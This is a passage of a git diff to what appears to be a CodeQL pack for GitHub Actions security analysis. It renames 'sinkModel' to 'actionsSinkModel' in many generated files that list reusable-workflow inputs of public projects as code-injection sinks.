["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1df..f41ee1211d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379..8a64c0ce5f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7..18e66bf7291 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd02..1ed7561a533 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6..738fde2cb86 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad..c61a63f1144 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf42..fef036f4f29 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd3..b13ba8bc40f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98..3fb2fefff6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24..4344e254be0 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 038f92a5317..2a7c5feafea 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59..9ccb41c3a8c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9..b71e6c001d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f5427..ff0695c0ef2 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa15482887..9576ce3892a 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f590..b78d6118411 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf5..cbe56806056 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553..391bbc6aacb 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2..f8b490726da 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf..889499eea3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c66..2dce19050ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1a..c80f8e732b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858..b85a11d81f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe..f8102400cc7 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d88224..1af7b832203 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a..c0688a4a5e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d..4e91308a004 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd5891..bc42c619599 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9..68925b294bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f9..c3ff42ed604 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d..964436f33ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5..995940550e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca..93653f07819 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053e..961070778cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3..9f1cc82523c 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73..68babc09b6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239e..f4271e5424b 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ad..f20f7997d3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc69..da5617fd144 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c9617..78821b4dad3 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c292901..f0c9290ca22 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcd..21d23698931 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1..ac38cac602d 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922..a9f87db955e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: 